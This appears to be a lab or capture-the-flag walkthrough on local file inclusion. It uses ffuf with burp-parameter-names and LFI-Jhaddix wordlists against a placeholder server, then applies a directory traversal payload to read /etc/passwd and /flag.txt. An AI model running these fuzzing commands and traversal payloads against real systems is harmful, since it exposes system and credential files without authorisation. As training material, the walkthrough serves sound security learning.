LinkedInGitHub

Automated Scanning

Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt

Step 1 - Fuzz parameters:

  • Use the burp-parameter-names.txt wordlist with the following command:

    • ffuf -w burp-parameter-names.txt:FUZZ -u 'http://SERVER_IP:SERVER_PORT/index.php?FUZZ' -fs 2309

Step 2 - Fuzz LFI payloads:

  • Use the LFI-Jhaddix.txt wordlist:

    • ffuf -w LFI-Jhaddix.txt:FUZZ -u 'http://SERVER_IP:SERVER_PORT/index.php?view=FUZZ' -fs 1935

Step 3 - Test one of the discovered payloads:

  • Append the payload to the application URL:

    • http://SERVER_IP:SERVER_PORT/index.php?view=../../../../../../../../../../../../../../../../../../../../../../etc/passwd

Step 4 - Get the flag:

  • Now simply substitute /etc/passwd for /flag.txt

    • ../../../../../../../../../../../../../../../../../../../../../../flag.txt

And flag found!

PreviousLog PoisoningNextFile Inclusion Prevention

Last updated